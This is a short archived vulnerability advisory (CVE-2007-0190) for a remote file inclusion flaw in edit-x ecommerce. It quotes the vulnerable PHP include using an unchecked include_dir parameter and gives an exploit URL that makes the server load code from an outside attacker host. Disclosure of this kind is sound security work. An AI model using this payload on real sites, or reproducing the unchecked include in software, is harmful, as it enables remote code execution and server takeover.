Bug: edit-x ecommerce (include_dir) Remote File include ( Ascii Version )

Search:
WLB2

edit-x ecommerce (include_dir) Remote File include

Published
Credit
Risk
2007.01.14
IbnuSina
High
CWE
CVE
Local
Remote
N/A
CVE-2007-0190
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

============================ HItamputih Crew ====================
# hitamputih Advisory
# Discovered By : IbnuSina
#-----------------------------------------------------------
# Software: edit x
# Vendor : http://www.edit-x.com
# Method: file inclusion
# Thanks To : akukasih,nyubi,irvian,BlueSpy,IFX,arioo and all #hitamputih crew

[[inject]]]---------------------------------------------------------

on file editx/edit_address.php

$_SESSION = array();
include($include_dir.'/'.'session.'.PHP);
include($include_dir.'/'.'function.'.PHP);
require_once("../ups/upsavs.php");

exploit :

http://target.lu/[editx PATH]/editx/edit_address.php?include_dir=HTTP://injekan.lu?

[[End]]-----------------------------------------------------------

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version